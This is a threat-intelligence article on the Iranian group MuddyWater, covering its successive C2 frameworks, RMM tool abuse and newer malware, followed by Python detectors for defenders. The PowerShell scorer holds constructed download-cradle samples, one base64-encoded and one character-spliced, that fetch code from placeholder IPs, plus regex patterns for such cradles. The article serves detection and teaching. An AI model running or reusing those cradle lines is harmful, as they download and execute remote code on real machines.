MuddyWater: How Iran's Intelligence Service Keeps Rebuilding Its Attack Infrastructure

Most Advanced Persistent Threat (APT) groups get exposed once and go quiet. MuddyWater gets exposed, has its source code leaked on Telegram, and watches security vendors publish full teardowns of its command and control (C2) setup. Then it builds a replacement within months and starts the cycle again. The group has done this at least five times since 2017. Each new framework fixes whatever detection method burned the last one.
That pattern matters more than any single campaign. A threat actor that rebuilds this persistently isn't going away when you block one indicator of compromise (IOC). Understanding the rebuild cycle tells you what to actually monitor for. The constants across every framework change are what reveal MuddyWater's operational constraints.
What everyone thinks happened
The media framing around MuddyWater tends to land on "Iranian hackers" as a single undifferentiated category. Iran runs several APT groups with different sponsors, mandates, and capabilities. They get bundled together in reporting as though MOIS (Ministry of Intelligence and Security) and IRGC (Islamic Revolutionary Guard Corps) operations are interchangeable.
MuddyWater is not an IRGC group, and conflating the two leads to bad threat modelling. A joint advisory from the FBI, CISA, CNMF (Cyber National Mission Force), and NCSC-UK in February 2022 formally attributed MuddyWater as "a subordinate element within the Iranian Ministry of Intelligence and Security." That attribution matters. MOIS is Iran's primary civilian intelligence agency, distinct from the IRGC's military intelligence operations. The group's targeting pattern reflects that institutional distinction clearly. IRGC-linked groups lean towards destructive, wiper-focused attacks on infrastructure. MuddyWater focuses on espionage, credential theft, and selling network access to other threat actors.
The other common misconception is that nation-state operations are inherently sophisticated. MuddyWater's actual tooling tells a very different story. The group has relied on PowerShell for C2 and abused legitimate remote monitoring and management (RMM) tools rather than building custom malware. Its primary delivery method is spearphishing emails with password-protected ZIP files. None of this involves zero-day capabilities or exotic exploits. They work because they blend into normal enterprise traffic, not because they're technically advanced.
What actually happened: the C2 evolution
MuddyWater's operational history is best understood through the lens of its command and control frameworks. Each replacement tells you what got detected and what the operators changed to avoid detection the next time.
POWERSTATS and MuddyC3 (2017 to 2020)
The group's original C2 framework, POWERSTATS, was a PowerShell-based tool that handled communication between compromised machines and MuddyWater's infrastructure. Running alongside it was MuddyC3, written in Python 2, which served as the management interface for operators controlling compromised endpoints.
Both tools relied heavily on obfuscated PowerShell scripts for execution, evasion, and communication. The PowGoop malware family from this period shows the pattern. A DLL renamed as Goopdate.dll enabled DLL side-loading through GoogleUpdate.exe. That process then decrypted a PowerShell script that called back to a hardcoded IP address. It was layered obfuscation rather than novel exploitation. It worked well enough that the group ran variants for three years.
The problem with Python 2 tooling is obvious in retrospect. Python 2 reached end of life in January 2020, meaning no further security updates and increasing compatibility issues. But the real vulnerability was operational security rather than technical debt.
PhonyC2 and the Telegram leaks (2021 to 2023)
PhonyC2 replaced MuddyC3, rewritten in Python 3 and active since 2021. Deep Instinct found three malicious PowerShell scripts in an archive labelled "PhonyC2_v6.zip" in April 2023, revealing the framework's inner workings. PhonyC2 generated PowerShell payloads that connected back to the C2 server and waited for operator commands. It was the same concept as MuddyC3, ported to Python 3.
The framework saw active use in significant operations. MuddyWater deployed PhonyC2 in the February 2023 attack against the Technion, an Israeli research institute. The same framework was used to exploit a log4j vulnerability in Israeli SysAid software and to target PaperCut print management systems.
Then the source code leaked, and everything changed. PhonyC2's code appeared on Telegram in April 2023, and MuddyC3's code followed on a separate Telegram channel in June 2023. Two frameworks, both compromised through source code exposure within two months. Once the source is public, every security vendor can write detection signatures for every function, string, and comms pattern in the code.
MuddyC2Go: the Golang rebuild (2020 to present)
MuddyC2Go is where the evolution gets interesting. Deep Instinct reported the framework in November 2023, but their analysis suggests it may have been in use since early 2020. That means the group was developing a Go-based replacement before the Python frameworks were even exposed.
The web component is written in Go, a compiled language that produces static binaries. That choice matters more to the operators than to defenders. The server side no longer depends on a Python interpreter and its version problems, and a single self-contained binary is quick to stand up again when infrastructure gets burned. On the victim side nothing changed: the implant is still a PowerShell script, so the endpoint detection surface is the same one that caught POWERSTATS and PhonyC2.
The delivery mechanism uses PowerGUI from Quest Software to build executables that contain embedded PowerShell scripts. When the executable runs, the PowerShell script automatically connects to the C2 server with no manual operator interaction required. The C2 server responds with another PowerShell script that runs in a loop every 10 seconds, polling for operator commands. That 10-second polling interval balances two competing needs. The operator doesn't want to wait long after issuing a command, but constant connections generate more network noise than periodic ones.
On 11 October 2023, a scan of a MuddyC2Go URL from Israel appeared on VirusTotal, pointing to a likely active operation against an Israeli target. The timing aligns with the broader escalation of MuddyWater activity that coincided with the Israel-Hamas conflict.
The Africa expansion (November 2023)
The Africa telecom campaign is significant because it marked MuddyWater's first operations against targets on the continent. Symantec's Threat Hunter Team documented activity against telecoms providers in Egypt, Sudan, and Tanzania in November 2023.
The toolset combined MuddyC2Go's PowerShell launcher with SimpleHelp, a legitimate remote access tool that MuddyWater had been using since at least July 2022. SimpleHelp runs as a system service with admin privileges and survives reboots. That gives the operators persistent access without deploying anything obviously malicious. The campaign also used Venom Proxy, a publicly available Go-based multi-hop proxy tied to the group since mid-2022. Symantec also found a custom keylogger they hadn't seen before.
Targeting African telecoms providers is a strategic intelligence play. Telecoms companies hold call records, subscriber data, and routing details for government officials, military staff, and business leaders. Owning a telco in a region of strategic interest gives an intelligence service access to comms metadata at scale, without needing to target each person.
The RMM tool abuse problem
Before looking at MuddyWater's more recent custom malware development, the RMM tool abuse timeline deserves its own section. This is the thread that connects the older and newer phases of the group's operations.
Between 2020 and 2024, MuddyWater cycled through at least seven legitimate RMM platforms:
| Period | Tool | Method |
|---|---|---|
| 2020 to 2022 | ScreenConnect, RemoteUtilities | Delivered via spearphishing |
| 2022 to 2023 | SimpleHelp | Ran as a system service, survived reboots |
| 2023 to 2024 | Atera Agent | Free trial abuse, registration via compromised email accounts |
| 2023 | N-able Advanced Monitoring Agent | Hosted on Storyblok content delivery platform |
| 2024 | ConnectWise, Syncro | Continued deployment |
The Atera abuse is particularly instructive. HarfangLab documented a campaign that ramped up from October 2023 through April 2024. Operators registered Atera agents using compromised business and private email accounts obtained through password spraying, credential data breaches, and purchased credentials. They exploited Atera's free trial offers, meaning the tooling cost them nothing. Every Atera installation looked like a legitimate remote management agent because it was one. The only difference was who registered the account.
The advantage is obvious: RMM tools are expected software in enterprise environments. IT teams use them daily, and security products generally treat them as trusted software. Alert thresholds for RMM traffic are typically high or nonexistent because the tools generate constant legitimate connections.
But MuddyWater burned through this approach faster than expected. By 2024, enough security vendors had published research on the group's RMM abuse that detection rates climbed sharply. If your EDR (Endpoint Detection and Response) product now flags unusual Atera installations or unexpected SimpleHelp connections as suspicious, the operational advantage of using legitimate tools disappears.
BugSleep, MuddyRot, and the custom malware shift (2024)
Check Point Research published their analysis of BugSleep in July 2024. It's a new custom backdoor: an x64 implant written in C with file download/upload, reverse shell access, and persistence setup. The backdoor uses execution delays to evade sandbox detection, hence the "sleep" in the name.
BugSleep, also called MuddyRot by Sekoia, marks a fundamental change in MuddyWater's approach. The group shifted from legitimate RMM tools to custom implants because security vendors had made RMM-based intrusions too detectable. Check Point noted explicitly that increased monitoring of RMM tools by security companies drove the change. The group deployed BugSleep via phishing lures starting in May 2024, targeting entities across Turkey, Azerbaijan, Jordan, Saudi Arabia, Israel, and Portugal.
This is a case where industry detection pressure directly changed an APT group's behaviour. MuddyWater used RMM tools because they were convenient, cheap, and invisible. When they stopped being invisible, the operators invested development time into purpose-built malware. The custom implant is more capable than a repurposed RMM agent but also more expensive to develop and maintain. That's exactly the trade-off that detection pressure is meant to force.
DarkBeatC2 and the 2024 infrastructure (April 2024)
Deep Instinct added another framework to the timeline in April 2024: DarkBeatC2. They placed it in the direct lineage from SimpleHarm through MuddyC3, PhonyC2, MuddyC2Go, and now DarkBeatC2. The framework uses a set of domains and IP addresses to manage infected endpoints, with PowerShell code handling the C2 contact.
The campaign intensified during the Israel-Hamas conflict, starting in late 2023. It included supply-chain attacks and fake hacktivist operations under the name "Lord Nemesis." Blending espionage with pseudo-hacktivist cover complicates attribution. If an attack appears to come from hacktivists rather than a state intelligence service, the political cost of hitting back drops and the diplomatic picture changes.
2025 to 2026: new malware, new targets
Group-IB reported a surge in European activity from early 2025. MuddyWater sharply cut back on widespread RMM-based intrusions and switched to a more targeted approach. New malware families appeared: StealthCache, Phoenix, Fooder, and LiteInject. The Phoenix backdoor was delivered via phishing emails to more than 100 governmental targets worldwide. The group's infrastructure spread across AWS, Cloudflare, M247, OVH, and bulletproof hosting from Stark Industries. C2 servers were kept online for only a few days at a time to avoid being mapped.
In January 2026, Group-IB documented an operation called Olalampo. It introduced more additions to the malware arsenal: CHAR (a backdoor written in Rust), GhostFetch and HTTP_VIP (both downloaders), and GhostBackDoor (an advanced backdoor). The campaign used a Telegram bot named "stager_51_bot" (display name "Olalampo") for C2 communication. Group-IB noted signs of AI-assisted coding in the malware, suggesting the operators are using code generation tools to build new implants faster.
The most significant escalation came in February 2026. Symantec reported MuddyWater targeting United States critical infrastructure for the first time. The targets included a bank, an airport, and a software company serving the defence and aerospace sector with operations in Israel. A Canadian non-profit organisation was also among the targets. The activity was detected following US and Israeli military strikes on Iran, suggesting direct retaliation as the motive.
The technical indicators from the US campaign are revealing. The Dindoor backdoor uses the Deno JavaScript runtime, executing JavaScript and TypeScript outside the browser. The FakeSet Python backdoor, found on US airport networks, was signed with code-signing certificates issued to "Amy Cherne" and "Donald Gay." The "Donald Gay" certificate had already been used to sign MuddyWater-linked malware, which gave researchers a direct attribution link. Data exfiltration was attempted using Rclone to a Wasabi cloud storage bucket.
Dindoor is a variant of the Tsundere botnet, first uncovered in late 2025. Check Point Research linked it to MuddyWater through VPS and vendor telemetry. The Tsundere connection matters because it ties MuddyWater's state-sponsored operations to cybercrime infrastructure. Check Point's March 2026 research showed MOIS actors, including MuddyWater and Void Manticore, overlap with criminal tools and services. The FakeSet downloader operates through CastleLoader as a Malware-as-a-Service (MaaS) platform. Void Manticore added the commercial infostealer Rhadamanthys to its arsenal.
This convergence gives MOIS actors two clear advantages over traditional state-only operations. First, access to mature criminal tooling and resilient infrastructure built to survive law enforcement takedowns. Second, muddied attribution, because the same infrastructure serves both state and criminal customers.
Myth vs fact
Myth: Nation-state attacks require sophisticated, zero-day capabilities.
MuddyWater's nine-year history runs on spearphishing emails with ZIP files, PowerShell scripts, DLL side-loading, and legitimate remote access tools. Where the group exploited vulnerabilities, they were old ones with patches available, such as CVE-2020-1472 (Netlogon elevation of privilege, "Zerologon") and CVE-2020-0688 (Exchange Control Panel remote code execution through a fixed machine key). In 2023 and 2024, a large share of intrusions ran on Atera agents registered through free trials with compromised email accounts and delivered to victims by phishing. None of those are exotic capabilities, and that's the point. They work because enterprise environments trust legitimate tools and struggle to distinguish attacker-controlled RMM sessions from IT-administered ones.
Myth: If you block known indicators of compromise, you've dealt with the threat.
MuddyWater has cycled through at least five C2 frameworks and seven RMM platforms since 2017. IOC-based detection works until the next framework ships, which historically happens within months. The constants across every iteration are more useful for detection. Look for obfuscated PowerShell, C2 polling at regular intervals, DLL side-loading through signed executables, and compromised credentials for initial access. Those behavioural patterns persist when the specific tools change.
Myth: RMM tools in your environment are inherently safe because they're legitimate software.
MuddyWater deployed ScreenConnect, RemoteUtilities, SimpleHelp, Atera, N-able, ConnectWise, and Syncro across different campaigns between 2020 and 2024. Every one of those is a legitimate product used by real IT teams. The group registered Atera agents using stolen credentials and free trials, creating installations that were functionally identical to authorised ones. Unless you maintain an allowlist of approved RMM tools and alert on anything else, an attacker-deployed RMM agent looks like any other remote session.
Myth: Only government networks are at risk from state-sponsored actors.
MuddyWater's targeting includes telecoms providers, oil and gas companies, engineering firms, healthcare organisations, educational institutions, and defence supply chain companies. The February 2026 campaign hit a bank, an airport, and a software vendor. The same joint advisory that attributed MuddyWater to MOIS noted that the group provides stolen data and access to the Iranian government. It also shares that access with other malicious cyber actors. Compromising a non-government target that holds data about government personnel or critical supply chains achieves the same intelligence objectives.
What would have stopped this
PowerShell visibility and constraint. PowerShell is the single constant across every MuddyWater framework from POWERSTATS through DarkBeatC2. Every C2 callback, every post-exploitation payload, and every lateral movement script relies on it. Constrained Language Mode restricts PowerShell to core cmdlets and types and blocks arbitrary .NET method calls, Add-Type, and COM objects, which is what most download cradles and in-memory loaders depend on. It only holds when an application control policy (AppLocker or WDAC) enforces it; the __PSLockdownPolicy environment variable on its own is a hint an attacker can simply remove. Script Block Logging (event ID 4104 in the PowerShell/Operational log) records each script block as it is compiled, so a payload that decodes itself and calls Invoke-Expression is logged in its decoded form as well as its obfuscated one. Module Logging captures which modules load and what they do. Those three controls create a detection surface that holds up no matter which C2 framework the group deploys this month.
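One way to put that logging to work, as an added example that is not code from the article or from any vendor: the indicator names, weights and threshold below are my own assumptions to be tuned on real telemetry, and the three samples are constructed to resemble the CommandLine of a process-creation event or the ScriptBlockText field of event 4104. The scorer decodes a -EncodedCommand payload and scores the decoded layer too, so the cradle hidden inside the base64 counts against the block.

```python
"""Score PowerShell command lines and script blocks for the obfuscation and
download-cradle patterns the article lists. Added example, not code from the
article or any vendor; indicator names, weights and the threshold are my own
assumptions, and the three samples are constructed."""
import base64
import math
import re
from collections import Counter

# Constructed samples, shaped like the CommandLine of a process-creation event
# or the ScriptBlockText field of PowerShell/Operational event 4104.
BENIGN = "Get-ChildItem -Path C:\\Logs -Filter *.evtx | Sort-Object LastWriteTime -Descending"
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED = "powershell -nop -w hidden -enc " + base64.b64encode(_CRADLE.encode("utf-16-le")).decode()
CONCAT = ("$a='Ne'+'w-Ob'+'ject';$b=[char]73+[char]69+[char]88;"
          "&($b) (&($a) Net.WebClient).DownloadString('http://203.0.113.5/p')")
SAMPLES = {"benign": BENIGN, "encoded": ENCODED, "concat": CONCAT}

# (name, pattern, weight). The weights are an assumption; tune them on your own telemetry.
INDICATORS = [(n, re.compile(p, re.I), w) for n, p, w in [
    ("encoded_command", r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", 3),
    ("hidden_window", r"-w(?:indowstyle)?\s+hidden", 1),
    ("no_profile", r"-nop\b|-noprofile", 1),
    ("invoke_expression", r"\biex\b|invoke-expression", 2),
    ("download_cradle", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", 2),
    ("char_casting", r"\[char\]\s*\d+", 2),
    ("string_splicing", r"'[^']*'\s*\+\s*'[^']*'", 1),
    ("call_operator_on_variable", r"&\s*\(\s*\$\w+\s*\)", 2),
]]
ENCODED_RE = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def shannon_entropy(s):
    """Bits per character; long high-entropy tokens are a supporting signal, not proof."""
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_block(text):
    """Score the raw text plus its decoded layer; each indicator counts once."""
    layers = [text]
    decoded = decode_encoded_command(text)
    if decoded:
        layers.append(decoded)
    hits = {}
    for layer in layers:
        for name, pattern, weight in INDICATORS:
            if name not in hits and pattern.search(layer):
                hits[name] = weight
    longest = max(text.split(), key=len)
    return {"score": sum(hits.values()), "indicators": sorted(hits),
            "decoded": decoded, "max_token_entropy": round(shannon_entropy(longest), 2)}


def triage(samples, threshold=4):
    """(label, score) for samples at or above the threshold, highest score first."""
    scored = [(label, score_block(text)["score"]) for label, text in samples.items()]
    return [(label, s) for label, s in sorted(scored, key=lambda x: -x[1]) if s >= threshold]


if __name__ == "__main__":
    for label, text in SAMPLES.items():
        print(label, score_block(text))
```

The benign administrative command scores zero, the encoded cradle scores on its launcher flags and on the decoded IEX/WebClient content, and the character-concatenation sample scores without any decoding because the splicing itself is the signal. Feed 4104 script blocks through the same scorer and the Invoke-Expression layer shows up as its own event, already decoded by the engine.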
RMM tool allowlisting. If your organisation uses Atera for remote management, any SimpleHelp or ConnectWise installation is suspicious by default. Maintain an explicit allowlist of approved RMM tools and set your EDR to alert on any remote management software that isn't on the list. The alert should trigger investigation rather than automatic blocking. False positives from Shadow IT are common, but every unapproved RMM installation deserves scrutiny.
Credential hygiene and phishing-resistant MFA (Multi-Factor Authentication). MuddyWater's post-2023 operations relied heavily on compromised credentials obtained through password spraying, credential reuse, and purchased credentials from data breaches. The October 2024 CISA advisory specifically documented MFA push bombing as a technique used to bypass standard push-notification MFA. Phishing-resistant MFA (FIDO2 security keys or certificate-based auth, not push notifications or SMS codes) shuts down the push-bombing vector. Password policies aligned with NIST Digital Identity Guidelines (long passphrases, not complexity rules, checked against breach databases) reduce the hit rate of password spraying.
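Both credential-access patterns named above leave a distinctive shape in authentication logs, and the following added example (my own code, not from the article or the CISA advisory) shows one way to surface them. The event records are constructed and their field layout is an assumption; real identity providers export different schemas, so map their fields to these before reuse. The thresholds are starting points, not recommendations from any source.

```python
"""Two detections over authentication events: password spraying (one source,
many accounts, one or two guesses each) and MFA push bombing (one account,
many pushes in a few minutes, often approved after repeated denials).
Added example, not code from the article or the CISA advisory; the events
are constructed and their schema is an assumption."""
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_events():
    """Constructed authentication log. 'type' is password or mfa_push."""
    t0 = datetime(2024, 5, 6, 2, 15, 0)
    ev = []
    # Spray: one external address, one guess per account, 12 accounts in under four minutes, one hit.
    users = [f"user{i:02d}" for i in range(11)] + ["m.rao"]
    for i, u in enumerate(users):
        ev.append({"ts": t0 + timedelta(seconds=20 * i), "user": u, "src": "203.0.113.77",
                   "type": "password", "result": "success" if u == "m.rao" else "failure"})
    # Push bombing against the account whose password was guessed: six pushes in 150 s.
    for i, r in enumerate(["denied", "timeout", "denied", "denied", "timeout", "approved"]):
        ev.append({"ts": t0 + timedelta(minutes=5, seconds=30 * i), "user": "m.rao",
                   "src": "203.0.113.77", "type": "mfa_push", "result": r})
    # Normal login hours later: one password success, one approved push.
    ev.append({"ts": t0 + timedelta(hours=6), "user": "a.lee", "src": "10.0.9.14",
               "type": "password", "result": "success"})
    ev.append({"ts": t0 + timedelta(hours=6, seconds=8), "user": "a.lee", "src": "10.0.9.14",
               "type": "mfa_push", "result": "approved"})
    return ev


def _window(sorted_events, start, window_s):
    return [e for e in sorted_events if 0 <= (e["ts"] - start["ts"]).total_seconds() <= window_s]


def detect_password_spray(events, window_s=600, min_accounts=8, max_guesses_per_account=2):
    """One source touching many accounts with few guesses each inside the window."""
    by_src = defaultdict(list)
    for e in events:
        if e["type"] == "password":
            by_src[e["src"]].append(e)
    findings = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        for start in evs:
            window = _window(evs, start, window_s)
            per_user = defaultdict(int)
            for e in window:
                per_user[e["user"]] += 1
            if len(per_user) >= min_accounts and max(per_user.values()) <= max_guesses_per_account:
                findings.append({"src": src, "accounts": len(per_user),
                                 "compromised": sorted({e["user"] for e in window
                                                        if e["result"] == "success"})})
                break  # one finding per source is enough
    return findings


def detect_push_bombing(events, window_s=300, min_pushes=4):
    """One account receiving many pushes in a short window, at least one not approved."""
    by_user = defaultdict(list)
    for e in events:
        if e["type"] == "mfa_push":
            by_user[e["user"]].append(e)
    findings = []
    for user, pushes in by_user.items():
        pushes.sort(key=lambda e: e["ts"])
        for start in pushes:
            window = _window(pushes, start, window_s)
            rejected = [e for e in window if e["result"] != "approved"]
            if len(window) >= min_pushes and rejected:
                findings.append({"user": user, "pushes": len(window), "rejected": len(rejected),
                                 "approved_after_pressure": window[-1]["result"] == "approved"})
                break
    return findings


if __name__ == "__main__":
    evs = constructed_events()
    print(detect_password_spray(evs))
    print(detect_push_bombing(evs))
```

The two detections chain naturally: an account that appears in the spray finding's compromised list and then in a push-bombing finding with approved_after_pressure set is the case the advisory describes, and the approval itself is the event to treat as a compromise, not a successful login.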
DLL side-loading detection. MuddyWater consistently uses DLL side-loading as a persistence and execution technique. The Huntress attack chain analysis documented FMAPP.exe, a legitimate Fortemedia application, loading a malicious FMAPP.dll that connected to C2 infrastructure. Monitor for DLL loads from unexpected directories, particularly where a signed executable loads a DLL from outside its install directory. That catches this technique regardless of which specific legitimate executable the attackers choose to abuse.
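The check described above, applied to the two side-loading chains the article mentions (goopdate.dll under GoogleUpdate.exe and FMAPP.dll under FMAPP.exe), as an added example that is my own code and not from the article, Huntress or Sysmon. The records are constructed, the field subset is an assumption about how Sysmon event 7 (Image loaded) was exported, and the first record is deliberately the legitimate Google Update loading its real goopdate.dll, which a naive name-based rule would flag.

```python
"""Flag DLL side-loading candidates in Sysmon event 7 (Image loaded) records.
Added example, not code from the article or any vendor; the records are
constructed and the field subset is an assumption about the export format.
A single weak signal (an unsigned DLL) is too common to alert on alone, so
a record needs at least two reasons before it is marked suspicious."""
import ntpath  # Windows path handling, works on any host

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\", "\\downloads\\")
TRUSTED_ROOTS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
# DLL names the article's sources saw abused (PowGoop and the Huntress chain).
KNOWN_SIDELOAD_NAMES = {"goopdate.dll", "fmapp.dll"}

SAMPLE_EVENTS = [  # constructed
    # Legitimate Google Update loading its own goopdate.dll from a versioned subfolder.
    {"Image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",
     "ImageLoaded": r"C:\Program Files (x86)\Google\Update\1.3.36.151\goopdate.dll",
     "Signed": "true", "SignatureStatus": "Valid", "Signature": "Google LLC"},
    # PowGoop pattern: the signed updater copied to a user profile next to a fake goopdate.dll.
    {"Image": r"C:\Users\jdoe\AppData\Roaming\Update\GoogleUpdate.exe",
     "ImageLoaded": r"C:\Users\jdoe\AppData\Roaming\Update\goopdate.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "Signature": ""},
    # Huntress pattern: the vendor executable pulling an FMAPP.dll from a public folder.
    {"Image": r"C:\Program Files\Fortemedia\FMAPP\FMAPP.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\FMAPP.dll",
     "Signed": "false", "SignatureStatus": "Unavailable", "Signature": ""},
    # Ordinary system activity.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\wevtsvc.dll",
     "Signed": "true", "SignatureStatus": "Valid", "Signature": "Microsoft Windows"},
]


def in_user_writable(path):
    return any(marker in path.lower() for marker in USER_WRITABLE)


def under_trusted_root(path):
    return path.lower().startswith(TRUSTED_ROOTS)


def assess(event):
    """Collect independent reasons a load looks like side-loading."""
    image, dll = event["Image"], event["ImageLoaded"]
    reasons = []
    if event.get("Signed", "").lower() != "true" or event.get("SignatureStatus") != "Valid":
        reasons.append("unsigned_or_invalid_dll")
    if in_user_writable(dll):
        reasons.append("dll_in_user_writable_dir")
    if in_user_writable(image):
        reasons.append("exe_in_user_writable_dir")  # vendor binary copied next to the payload
    if ntpath.dirname(dll).lower() != ntpath.dirname(image).lower() and not under_trusted_root(dll):
        reasons.append("dll_outside_exe_and_system_dirs")
    # A known abused name only adds weight when something else is already off,
    # otherwise the genuine goopdate.dll in Program Files would alert on every update.
    if ntpath.basename(dll).lower() in KNOWN_SIDELOAD_NAMES and reasons:
        reasons.append("known_sideload_name")
    return {"image": image, "dll": dll, "reasons": reasons, "suspicious": len(reasons) >= 2}


def find_sideloads(events):
    return [a for a in map(assess, events) if a["suspicious"]]


if __name__ == "__main__":
    for finding in find_sideloads(SAMPLE_EVENTS):
        print(finding["image"], "->", finding["dll"], finding["reasons"])
```

In production the Image field should also be joined to the process-creation event (Sysmon event 1), which carries the executable's own signature, so the rule can require "signed vendor binary" rather than inferring it from the path.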
Network segmentation and C2 beacon detection. MuddyC2Go's 10-second polling interval creates a detectable periodic pattern in network traffic. More broadly, any persistent C2 connection generates regular outbound connections to the same destination at consistent intervals. Network monitoring that flags periodic outbound calls to unknown or newly registered domains catches C2 callbacks from custom frameworks before signatures exist.
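The periodic pattern described here and in the MuddyC2Go section (a PowerShell loop polling every 10 seconds) can be pulled out of ordinary proxy or firewall logs without any signature. The following is an added example, my own code rather than anything from the article or Symantec, Deep Instinct or Symantec's tooling; the log format is an assumption and the lines are constructed, with one host polling a single address every 10 seconds plus or minus a second and another host browsing in irregular bursts. The test for regularity is the coefficient of variation of the gaps between connections, which is deliberately resilient to the bursty "many requests one second apart" shape that a median-based check would misread as periodic.

```python
"""Find periodic outbound connections (C2 polling) in proxy or firewall logs.
Added example, not code from the article or any vendor; the log lines are
constructed and the line format '<ISO8601> <src_ip> <dst>:<port>' is assumed."""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_log():
    """Constructed log lines, sorted by time. Not real traffic."""
    base = datetime(2024, 3, 4, 9, 0, 0)
    lines = []
    # Host A polls one IP every ~10 s with +/-1 s jitter, like the MuddyC2Go loop.
    for off in (0, 10, 21, 30, 40, 51, 60, 69, 80, 90, 101, 110):
        lines.append(f"{(base + timedelta(seconds=off)).isoformat()} 10.0.4.21 198.51.100.7:443")
    # Host B browses: bursts of requests a second apart, then long irregular gaps.
    for off in (3, 4, 5, 31, 32, 58, 59, 60, 61, 97, 98):
        lines.append(f"{(base + timedelta(seconds=off)).isoformat()} 10.0.4.22 www.example.com:443")
    return sorted(lines)


def group_by_pair(lines):
    """Map (src, dst) to the sorted list of connection timestamps."""
    by_pair = defaultdict(list)
    for line in lines:
        ts, src, dst = line.split()
        by_pair[(src, dst)].append(datetime.fromisoformat(ts))
    for times in by_pair.values():
        times.sort()
    return by_pair


def find_beacons(lines, min_events=8, max_cv=0.2, min_interval=1.0,
                 max_interval=3600.0, allowlist=frozenset()):
    """Flag (src, dst) pairs whose inter-connection gaps are nearly constant.

    allowlist holds destination hosts known to poll legitimately (update
    services, NTP, your own RMM), which would otherwise match just as well.
    """
    findings = []
    for (src, dst), times in group_by_pair(lines).items():
        if dst.split(":")[0] in allowlist or len(times) < min_events:
            continue
        deltas = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.fmean(deltas)
        cv = statistics.stdev(deltas) / mean if mean else float("inf")
        if min_interval <= mean <= max_interval and cv <= max_cv:
            findings.append({"src": src, "dst": dst, "events": len(times),
                             "interval_s": round(mean, 1), "cv": round(cv, 3)})
    return findings


if __name__ == "__main__":
    for f in find_beacons(constructed_log()):
        print(f)
```

The output names the polling host, the destination and the recovered interval, which is the handover point to the destination checks the paragraph describes: domain age, reputation, and whether anyone in the organisation can account for the traffic. Tighten max_cv once you know how much jitter your real beacons show; an implant that randomises its sleep will need a longer window and a looser threshold.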
What changed after
MuddyWater's trajectory from 2024 through early 2026 shows an acceleration rather than a retreat.
The shift from RMM abuse to custom malware means the group is spending more per operation but gaining harder-to-detect tools. BugSleep and MuddyRot are purpose-built rather than repurposed commercial tools. That makes them more effective but also more attributable once analysed.
The convergence with cybercrime infrastructure is the more significant development. MOIS actors using Malware-as-a-Service platforms and commercial infostealers means that separating state-sponsored operations from criminal activity becomes harder for incident responders. Any company that finds MuddyWater tooling on its network now has to ask: is this Iranian intelligence, cybercrime, or both?
The US critical infrastructure targeting in February 2026 is a direct escalation in scope. MuddyWater operated for years within the Middle East, then expanded to Africa in late 2023 and increased European activity through 2025. Then it moved to US airports and banks. That targeting pattern follows geopolitical pressure rather than opportunity. The Symantec report notes that the February 2026 activity was detected following US and Israeli military strikes on Iran.
For defensive teams, the practical takeaway is that MuddyWater's operational constants matter more than its specific tooling. The group has used at least five C2 frameworks in nine years, and every one of them from POWERSTATS through DarkBeatC2 drives its implant with obfuscated PowerShell. Campaigns from 2020 onwards have leaned on RMM tool abuse or DLL side-loading for persistence. Initial access consistently comes through spearphishing or compromised credentials. Those are the detection surfaces worth investing in, because they persist when the specific tools change, and they will change.